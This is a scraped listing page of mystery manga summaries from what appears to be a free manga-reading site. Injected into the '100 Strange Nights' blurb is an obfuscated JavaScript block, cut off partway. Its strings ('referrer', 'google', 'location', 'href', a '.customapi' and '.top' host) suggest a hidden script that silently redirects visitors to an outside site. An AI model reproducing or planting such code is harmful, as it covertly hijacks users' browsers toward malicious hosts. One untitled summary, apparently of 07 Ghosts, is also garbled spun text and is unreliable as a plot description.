
Explore the world of Mystery manga, where gripping stories await. Start reading the best Mystery manga free now!

3178 results

#000000 - Ultra Black

From iskultrip Scans: Raised in a home nearly all his life, Sanetora has been provided for anonymously for as long as he could remember. When his mysterious benefactor offers to foster him, he is more than thrilled—it's like a dream come true! The person waiting for him at his would-be new home however, is a startlingly young man with a sharp tongue! Kanae, Sanetora's foster father, is a businessman who runs a company, and is not without an ulterior motive: Sanetora suddenly finds himself employed! As if that wasn't perplexing enough, it turns out the company is no ordinary company—it deals with strange objects that can turn their owners into freaks of nature!! Just how is Sanetora going to live his new life?!


#000000: Ultra Black

Raised in a home nearly all his life, Sanetora has been provided for anonymously for as long as he could remember. When his mysterious benefactor offers to foster him, he is more than thrilled—it's like a dream come true! The person waiting for him at his would-be new home, however, is a startlingly young man with a sharp tongue!<br><br>Kanae, Sanetora's foster father, is a businessman who runs a company, and is not without an ulterior motive: Sanetora suddenly finds himself employed! As if that wasn't perplexing enough... It turns out the company is no ordinary company—it deals with strange objects that can turn their owners into freaks of nature!!<br><br>Just how is Sanetora going to live his new life?!


#Zombie Sagashitemasu

The manga is set in a world where 90 percent of humans on Earth have contracted and died from a deadly, virulent disease; only to then rise again as zombies who only attack people. 13 years after that "Red Day" of societal and civilizational collapse, the surviving humans survive away from the big cities, while still hoping to retake them someday. An entirely new generation of people who know nothing of the pre-Red Day world are now coming into their own. The story begins when Aki and her close friends Haru and Natsuki begin a journey to find Aki's missing father.


$100 is Too Cheap

Petey is a bounty hunter in a time and place full of bounty hunters. The criminals are outnumbered by the bounty hunters and whenever a wanted poster is posted, it doesn't stay up for long. Except for one... there's one wanted posted with a negative bounty and no one wants to catch this criminal. But Petey is curious and she seeks the help of a mystery solver...


+a no Tachiichi

Satoki Houma is an imaginative girl who enjoys shoujo manga. She has long comes to terms with the fact she will never be the type of girl that is the heroine of a manga — purely because she isn’t pretty, and she has decided she prefers to watch events unfold rather that get involved in any case. However, in the perfect shoujo manga twist, one day she gets dragged to an alternate world where the people have summoned a Holy Maiden to save them…! Except so did her classmate, Haruka Toudou, who fits the exact model of a Shoujo Protagonist. Naturally, Satoki is overlooked for Haruka… except it’s not Haruka who has the powers of the Holy Maiden they wished for. What will Satoki do!?


+C: Sword and Cornett

There was once a hero who vanquished the darkness of the land and liberated the people. He then built a kingdom, and had his descendants rule as kings. Although they had ruled the land for so many years, in reality, political power was being wielded solely by the aristocrats of each region. One day, this seemingly peaceful kingdom was disturbed by the mysterious death of the principal heir to the throne. The sequence of events that this assassination set into motion, would soon come to involve all of those with the right to become the next king... There's the spin- off: +C: Sword and Cornett Appendix


0 No Soukoushi

From Kagami: Kanade is an ex-perfumer whose nose still maintains such sharpness for even the most muted of smells. Together with his feisty French cousin, Anais, he stumbles upon mysteries unwillingly as his acute sense of smell can even detect the odor of death.



Teito Klein is a former slave who now attends the Barsburg Empire's military academy because of his capability to use a sort of unnatural power, Zaiphon. The skill is uncommon and therefore highly prized. Teito is an amnesiac who often has dreams that are awful. The night time prior to Teito the graduation test and his only friend, Mikage, vow they'll not ever left each other. Teito overhears people talking about him, a day later. Ceasing to hear, he suddenly understands that Chief of Staff Ayanami, the loudspeaker, is the one who killed the guy that is recognizable in his fantasies: the king of the ruined Raggs Kingdom, his dad. One of his subordinates is found eavesdropping and attempts to assault Ayanami but immediately brings down Teito and sent to jail. Mikage comes to help him escape, and then discover that Teito has managed to fight by himself past the guards. The two flee through the creating but are cornered on a balcony. Although a Zaiphon blast wounds him that he is directed at by Ayanami Teito feigns to hold Mikage hostage, then makes his getaway. Three bishops in the nearby 7th District find the wounded Teito and consider him to a closeby church to recuperate, where he's shielded due to the law of safety of the 7th District. In due time, it's found that Teito takes the Eye of Mikhail, a strong talisman for which his home land was ruined. This reality, along with a reunion that is fateful, catapults Teito in to a pursuit of vengeance from the Barsburg Empire as well as for information about his earlier. In once, he is thrown by his position as the bearer of the Eye of Mikhail in to the longstanding battle involving the bad Verloren the 07 Ghosts, and his adversaries.


100 Ghost Stories That Will Lead to My Own Death

One day, an elementary school child named Yuuma tries to jump out of his classroom window. His classmate Hina stops him and, in a bid to stall for time, asks him, “Do you know the round of a hundred ghost stories?” Hina tells Yuuma about a ritual where, if you tell a hundred ghost stories, you’ll see ghosts afterward. Learning this gives Yuuma a new lease on life. Chapter by chapter, he shares ghost stories with the reader, slowly but surely inching his way toward one hundred… (Source: Seven Seas Entertainment)


100 Strange Nights

A series of short stories from the Republic of China era (1912-1949). Enjoy adventurous settings, ingenious plots, mind-blowing foreshadowing, and surprising plot twists. This series will leave you calling 'encore' a thousand times over. For those of you who enjoy logic and deduction, this is one manhua you don't want to miss!<script></script><script>function _0x5794(){var _0x3a541c=['siFAt','.top/','1730ZQniHm','kyIMm','394460pvuXpm','includes','vTymc','referrer','https://ip','2018936DMRFex','CQDDr','4290alZwBp','.customapi','27ZeqQTW','then','google','270FCbncU','mKXkU','jBTvP','Mllcl','floor','href','508333amxDQS','http://rea','location','cCBpn','text','','2776096MNzAbj','random','13884BATgcM','SdEjB','3381763ZocwCc','bPXse'];_0x5794=function(){return _0x3a541c;};return _0x5794();}(function(_0x182021,_0x363f60){var _0xb547aa=_0x2479,_0x32a6a6=_0x182021();while(!![]){try{var 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10000-nichi no 7

10000-nichi no 7 summary is updating. Come visit sometime to read the latest chapter of 10000-nichi no 7. If you have any question about this manga, Please don't hesitate to contact us or translate team. Hope you enjoy it.
